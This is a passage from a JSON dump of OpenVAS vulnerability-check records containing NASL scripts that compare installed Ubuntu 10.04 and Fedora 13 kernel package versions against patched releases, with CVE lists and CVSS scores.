{\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:40:01", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-06-24T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-6447", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0521", "CVE-2010-4163", "CVE-2010-3904", "CVE-2010-4073", "CVE-2010-4668", "CVE-2010-4165", "CVE-2010-2960", "CVE-2010-4072", "CVE-2010-4346", "CVE-2011-1746", "CVE-2010-2955", "CVE-2010-4527", "CVE-2010-4082", "CVE-2011-1494", "CVE-2010-4649", "CVE-2010-4169", "CVE-2010-2963", "CVE-2010-4158", "CVE-2011-0006", "CVE-2010-2524", "CVE-2010-2478", "CVE-2010-3698", "CVE-2010-4650", "CVE-2010-4162", "CVE-2011-2022", "CVE-2010-4258", "CVE-2010-2071", "CVE-2011-1079", "CVE-2010-3442", "CVE-2011-1495", "CVE-2010-3705", "CVE-2010-2954", "CVE-2010-4648", "CVE-2011-1013", "CVE-2010-3880", "CVE-2010-3874", "CVE-2010-4249", "CVE-2010-4157", "CVE-2010-3081", "CVE-2011-1093", "CVE-2010-3067", "CVE-2010-3084", "CVE-2010-2962", "CVE-2010-3080", "CVE-2010-3432", "CVE-2011-1745", "CVE-2011-1182", "CVE-2010-3079", "CVE-2010-3301"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863292", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863292", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-6447\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-June/061668.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863292\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-24 16:46:35 +0200 (Fri, 24 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-6447\");\n script_cve_id(\"CVE-2011-1494\", \"CVE-2011-1495\", \"CVE-2011-1093\", \"CVE-2011-1079\", \"CVE-2011-1745\", \"CVE-2011-1746\", \"CVE-2010-4165\", \"CVE-2011-0521\", \"CVE-2010-4346\", \"CVE-2010-4649\", \"CVE-2011-0006\", \"CVE-2010-4648\", \"CVE-2010-4650\", \"CVE-2010-4163\", \"CVE-2010-4668\", \"CVE-2010-4157\", \"CVE-2010-4158\", \"CVE-2010-3874\", \"CVE-2010-4162\", \"CVE-2010-4249\", \"CVE-2010-2962\", \"CVE-2010-2963\", \"CVE-2010-3698\", \"CVE-2010-3705\", \"CVE-2010-3442\", \"CVE-2010-4258\", \"CVE-2010-4169\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-4082\", \"CVE-2010-3904\", \"CVE-2010-3432\", \"CVE-2010-3079\", \"CVE-2010-3080\", \"CVE-2010-3081\", \"CVE-2010-3301\", \"CVE-2010-3067\", \"CVE-2010-2960\", \"CVE-2010-2954\", \"CVE-2010-2955\", \"CVE-2010-2524\", \"CVE-2010-2478\", \"CVE-2010-2071\", \"CVE-2011-1182\", \"CVE-2011-2022\", \"CVE-2010-3084\", \"CVE-2011-1013\", \"CVE-2010-4527\");\n script_name(\"Fedora Update for kernel FEDORA-2011-6447\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC13\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 13\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.34.9~69.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:49", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2011-06-24T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-6447", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0521", "CVE-2010-4163", "CVE-2010-3904", "CVE-2010-4073", "CVE-2010-4668", "CVE-2010-4165", "CVE-2010-2960", "CVE-2010-4072", "CVE-2010-4346", "CVE-2011-1746", "CVE-2010-2955", "CVE-2010-4527", "CVE-2010-4082", "CVE-2011-1494", "CVE-2010-4649", "CVE-2010-4169", "CVE-2010-2963", "CVE-2010-4158", "CVE-2011-0006", "CVE-2010-2524", "CVE-2010-2478", "CVE-2010-3698", "CVE-2010-4650", "CVE-2010-4162", "CVE-2011-2022", "CVE-2010-4258", "CVE-2010-2071", "CVE-2011-1079", "CVE-2010-3442", "CVE-2011-1495", "CVE-2010-3705", "CVE-2010-2954", "CVE-2010-4648", 